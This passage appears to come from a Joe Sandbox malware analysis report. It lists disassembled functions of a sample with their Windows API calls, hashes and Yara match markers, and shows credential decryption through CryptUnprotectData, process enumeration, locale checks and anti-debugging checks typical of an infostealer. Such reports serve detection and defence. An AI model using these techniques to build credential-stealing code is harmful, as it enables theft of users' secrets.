                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N@
                                  • API String ID: 4291131564-4229412743
                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                  Function 022F7DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022F7E48
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022F7E60
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 022F7E74
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022F7EC9
                                  • LocalFree.KERNEL32(00000000), ref: 022F7F89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID:
                                  • API String ID: 3090951853-0
                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                  • Instruction ID: 5dfc4d8cbe0b65a59f697f838489a01278a062af1954ac38985a9f90d1b60f36
                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                  • Instruction Fuzzy Hash: E3415B71960218ABDB64DF94DC98FEDF3B5FB54700F1041A9E109A6284DB742F89CF90
                                  Function 022FB5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 022FBE09
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022FBE1E
                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022FBE29
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 022FBE45
                                  • TerminateProcess.KERNEL32(00000000), ref: 022FBE4C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction ID: 66904e2d839ba537b90f339f0b5abf305c8a958dd3c8f097508dc97e1289fb80
                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction Fuzzy Hash: 4721C0BC910305DFDB54DF69F9886967BE4FB0E304F50403AE90A872A4EBB05981EF49
                                  Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                  Function 022E74A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022E74B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E74BB
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022E74E8
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022E750B
                                  • LocalFree.KERNEL32(?), ref: 022E7515
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction ID: ac2e596f8264ad7b28ded79ca0de264b4ff0e531e91211e9fc5c2b9ce0003d93
                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction Fuzzy Hash: 75010075A90208BBEB10DFD4DD45F9D77B9EB44704F104155FB06AA2C4D6B0AA00CB65
                                  Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 3657800372-0
                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                  Function 022F9867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022F9885
                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 022F9899
                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 022F98AE
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 022F98C3
                                  • CloseHandle.KERNEL32(00420ACA), ref: 022F98E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction ID: a4468b1a8db77ef6ba41993f3c9aab8bf6032606c7d1dabf9a8951829bf86d50
                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction Fuzzy Hash: BB010C79A60208FFDB60DFE4CD54BEDB7F9EF49700F004199A506A6244D7749A84CF51
                                  Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                  Function 022EE697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022EE709
                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 022EE759
                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 022EE76F
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EEE46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID:
                                  • API String ID: 433455689-0
                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                  • Instruction ID: d2484f52ba7a2c3e5aa87b654957175244c4dfe37349d949c1ce3eb7e6c39a22
                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                  • Instruction Fuzzy Hash: 1812FA71A203189BDB58FBA4DDA5EEDB37AAF54300F4041B9A60E52198EF345F88CF51
                                  Function 022F9107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,022E53EB,40000001,00000000,00000000,?,022E53EB), ref: 022F9127
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction ID: 2550f52006e8f2b83976578b9a03c54a2d1ad19c17d673727e77d486c509de24
                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction Fuzzy Hash: 5B111F74214205BFDB40CF94DC98FA773AAAF89740F009578FA098B264D775E881DB60
                                  Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                  Function 022E9D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                                  • LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction ID: 963b71b57383a2556b51831be05b983c99cd137e100eaf3de134f3754485e773
                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction Fuzzy Hash: 1711A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208059FD159B394C776A941CB90
                                  Function 022E9DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022E9DEB
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 022E9E0A
                                  • memcpy.MSVCRT(?,?,?), ref: 022E9E2D
                                  • LocalFree.KERNEL32(?), ref: 022E9E3A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction ID: f48408bfef89aa8dd0a135fe1a204d7657bd1f91c845ba2acd1cfad65f451b00
                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction Fuzzy Hash: 021109B8A00209EFDB04DFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                  Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                  Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0088AA80,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0088AA80,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0088AA80,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                  • wsprintfA.USER32 ref: 00417AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 362916592-0
                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                  Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                  Function 022E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$GetProcAddress.$l
                                  • API String ID: 0-2784972518
                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction ID: 729509d9cad45209f4adc6cfc72b6d5237bdc4143424d61a88d679ce3ad6bd9c
                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction Fuzzy Hash: B43169B6910609CFDB20CF99C880AAEBBF5FF18724F54404AD442B7314D7B1EA45CBA4
                                  Function 022EF8F1 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                                  • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                  • Instruction ID: 5ffafe99b1c26a64b92a10fdfac79120001bddd4b96ffc411f997a5b06042896
